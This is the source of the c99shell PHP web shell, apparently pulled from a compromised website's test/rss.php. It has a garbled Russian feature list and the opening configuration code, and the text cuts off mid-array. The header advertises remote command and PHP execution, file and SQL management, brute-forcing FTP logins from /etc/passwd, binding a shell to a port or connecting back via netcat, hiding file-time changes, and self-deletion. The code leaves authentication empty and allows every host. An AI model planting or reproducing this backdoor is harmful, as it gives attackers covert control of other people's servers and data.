Warning: main() [function.include]: Failed opening '' for inclusion (include_path='/mnt/171/sdb/d/3/amissc/include:.:/usr/php4/lib/php') in /mnt/171/sdb/d/3/amissc/test/rss.php on line 2
******************************************************************************************************
*
* c99shell.php v.1.0 pre-release build #5
* Freeware license.
* © CCTeaM.
* c99shell - ôàéë-ىهيهنوهً ÷هًهç www-لًîَçهً, "çàٍî÷هيûé" نëے âçëîىà.
* آû ىîوهٍه لهٌïëàٍيî ٌêà÷àٍü ïîٌëهني âهًٌè يà نîىàّيهé ًٌٍàيè÷êه ïًîنَêٍà:
http://ccteam.ru/releases/c99shell
*
* WEB: http://ccteam.ru
* ICQ UIN #: 656555
*
* خٌîلهييîٌٍè:
* + َïًàâëهيèه ëîêàëüيûىè è َنàëهييûىè (ftp, samba *) ôàéëàىè/ïàïêàىè, ٌîًٍèًîâêà
* çàêà÷èâàيèه ٌêà÷èâàيèه ôàéëîâ è ïàïîê
* (ïًهنâîًèٍهëüيî َïàêîâûâàهٌٍے/ًàٌïàêîâûâàهٌٍے ÷هًهç tar *)
* ïًîنâèيٍَûé ïîèٌê (âîçىîوهي âيًٍَè ôàéëîâ)
* modify-time è access-time َ ôàéëîâ يه ىهيےٌٍے ïًè ًهنàêٍèًîâàيèè (âûêë./âêë. ïàًàىهًٍîى $filestealth)
* + ïًîنâèيٍَûé SQL-ىهيهنوهً يه ٌٍََïàùèé phpmyadmin,
ïًîٌىîًٍ/ٌîçنàيèه/ًهنàêٍèًîâàيèه ءؤ/ٍàلëèِ, ïًîٌىîًٍ ôàéëîâ ÷هًهç لًهّü â mysql
* + َïًàâëهيèه ïًîِهٌٌàىè unix-ىàّèيû.
* + َنîليîه (èيîمنà مًàôè÷هٌêîه) âûïîëيهيèه shell-êîىàين (ىيîمî àëèàٌîâ, ىîويî ًهنàêٍèًîâàٍü)
* + âûïîëيهيèه ïًîèçâîëüيîمî PHP-êîنà
* + êîنèًîâùèê نàييûُ ÷هًهç md5, unix-md5, sha1, crc32, base64
* + لûًٌٍûé ëîêàëüيûé àيàëèç لهçîïàٌيîٌٍè خر
* + لûًٌٍîه ftp-ٌêàيèًîâàيèه يà ٌâےçêè login;login èç /etc/passwd (îلû÷يî نàهٍ نîٌٍَï ê 1/100 àêêàَيٍîâ)
* ïîًٌٍàيè÷يûé âûâîن, ٌîًٍèًîâêà, مًَïïîâûه îïهًàِèè يàن ءؤ/ٍàلëèِàىè, َïًàâëهيèه ïًîِهٌٌàىè SQL)
* + ٌêًèïٍ "ëلèٍ" include: àâٍîىàٍè÷هٌêè èùهٍ ïهًهىهييûه ٌ نهٌêًèïٍîًàىè è âٌٍàâëےهٍ èُ â ٌٌûëêè (îïِèàëüيî)
ٍàêوه ىîويî èçىهيèٍü $surl (لàçîâàے ٌٌûëêà) êàê ÷هًهç êîيôèمًَàِè (ïًèيَنèٍهëüيî) ٍàê è ÷هًهç cookie "c99sh_surl",
èنهٍ àâٍî-çàïèٌü çيà÷هيèے $set_surl â cookie "set_surl"
* + âîçىîويîٌٍü "çàلèينèٍü" /bin/bash يà îïًهنهëهييûé ïîًٍ ٌ ïًîèçâîëüيûى ïàًîëهى,
* èëè ٌنهëàٍü back connect (ïًîèçâîنèٌٍے ٍهٌٍèًîâàيèه ٌîهنهيهيèے, è âûâîنےٌٍے ïàًàىهًٍû نëے çàïٌَêà NetCat).
* + âîçىîويîٌٍü لûًٌٍîمî ٌàىî-َنàëهيèے ٌêًèïٍà
* + àâٍîىàٍèçèًîâàيàے îٍïًàâêà ٌîîلùهيèé î يهنîًàلîٍêàُ è ïîوهëàيèé àâٍîًَ (÷هًهç mail())
* * - ٌَïهُ ïîëيîٌٍü çàâèٌèٍ îٍ êîيôèمًَàِèè PHP
*
* آ îلùهى يَويî َâèنهٍü âٌ¸ ٍî!
*
* خوèنàهىûه èçىهيهيèے:
* ~ ذàçâèٍèه sql-ىهيهنوهًà
* ~ ؤîلàâëهيèه يهنîٌٍàùèُ ًàٌّèًهيèé ôàéëîâ
*
* ~-~ دèّèٍه îلî âٌهُ يàéنهيûُ يهنîًàلîٍêàُ, وهëàهىûُ èçىهيهيèےُ è نîًàلîٍêàُ (نàوه î ٌàىûُ يهçيà÷èٍهëüيûُ!)
â ICQ UIN #656555 ëèلî ÷هًهç ًàçنهë "feedback", لَنٍَ ًàٌٌىîًٍهيû âٌه ïًهنëîوهيèے è ïîوهëàيèے.
*
* Last modify: 3.07.2005
*
* © Captain Crunch Security TeaM. Coded by tristram
*
******************************************************************************************************
*/
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "1.0 pre-release build #5"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
if (stristr($_SERVER["GATEWAY_INTERFACE"],"cgi")) {$login = "";} // If CGI then turn off auth.
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "c99shell v.".$shver.": access denied";
$gzipencode = true; //Encode with gzip?
$autoupdate = false; //Automatic updating?
$updatenow = false; //If true, update now (this variable will be false)
$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
$filestealth = true; //if true, don't change modify&access-time
$donated_html = "Owned by hacker";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = true; //If true then save sorting-type.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")."